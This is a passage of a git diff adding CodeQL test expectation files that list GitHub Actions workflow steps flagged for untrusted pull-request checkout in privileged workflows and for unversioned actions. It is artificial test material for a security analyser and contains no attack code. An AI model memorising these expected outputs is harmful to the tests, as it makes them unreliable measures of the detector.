.github/workflows/test16.yml:236:9:248:6 | Uses Step | +| .github/workflows/test16.yml:236:9:248:6 | Uses Step | .github/workflows/test16.yml:248:9:270:6 | Run Step | +| .github/workflows/test16.yml:248:9:270:6 | Run Step | .github/workflows/test16.yml:270:9:273:6 | Run Step | +| .github/workflows/test16.yml:270:9:273:6 | Run Step | .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | +| .github/workflows/test16.yml:273:9:277:6 | Run Step: zips | .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | +| .github/workflows/test16.yml:277:9:281:6 | Run Step: tests | .github/workflows/test16.yml:281:9:294:54 
| Uses Step | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:33:15:36:12 | Run Step | +| .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | +| .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | +| .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | +| .github/workflows/test21.yml:18:9:25:6 | Uses Step | .github/workflows/test21.yml:25:9:27:36 | Run Step | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | .github/workflows/test22.yml:62:15:62:45 | Run Step | +| .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | +| .github/workflows/test24.yml:7:9:10:6 | Uses Step | .github/workflows/test24.yml:10:9:16:6 | Run Step | +| .github/workflows/test24.yml:10:9:16:6 | Run Step | .github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | +| .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | +| .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | +| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | +| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | 
Run Step | +| .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout4.yml:11:7:29:4 | Uses Step: get-pr | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:11:9:15:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:26:9:30:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | +| 
.github/workflows/untrusted_checkout_5.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_5.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_5.yml:21:9:23:23 | Run Step | +| .github/workflows/untrusted_checkout_6.yml:11:9:14:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:14:9:17:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | +| .github/workflows/untrusted_checkout_6.yml:17:9:21:6 | Uses Step | .github/workflows/untrusted_checkout_6.yml:21:9:23:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | +| .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | +#select +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:79:9:84:6 | 
Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Potential execution of untrusted 
code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| 
.github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:60:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:60:9:60:37 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:14:7:21:11 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | 
Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | 
pull_request_target | +| .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref new file mode 100644 index 000000000000..9f17733e16e8 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected new file mode 100644 index 000000000000..6e33259f3922 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected 
@@ -0,0 +1,23 @@ +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_direct.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_heuristic.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/issue_comment_octokit.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:103:9:109:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:139:9:144:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:444:9:449:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:20:7:25:4 | Uses Step | Potential execution of 
untrusted code on a privileged workflow ($@) | .github/workflows/test13.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout2.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref new file mode 100644 index 000000000000..66b3f2cd9bf2 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutHigh.ql diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected new file mode 100644 index 000000000000..2b9bf3f2b79a --- /dev/null 
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -0,0 +1,10 @@ +| .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref new file mode 100644 index 000000000000..55bb194f5ecd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref @@ -0,0 +1 @@ +Security/CWE-829/UntrustedCheckoutMedium.ql 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected new file mode 100644 index 000000000000..a1e4537e9265 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected 
@@ -0,0 +1,26 @@
+| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script |
+| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script |
+| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout |
+| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout |
+| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout |
+| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout |
+| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action |
+| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout |
+| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout |
+| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout |
+| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages |
+| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact |
+| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages |
+| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout |
+| .github/workflows/resolve-args.yml:19:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/resolve-args.yml:19:9:20:6 | Uses Step | actions/checkout |
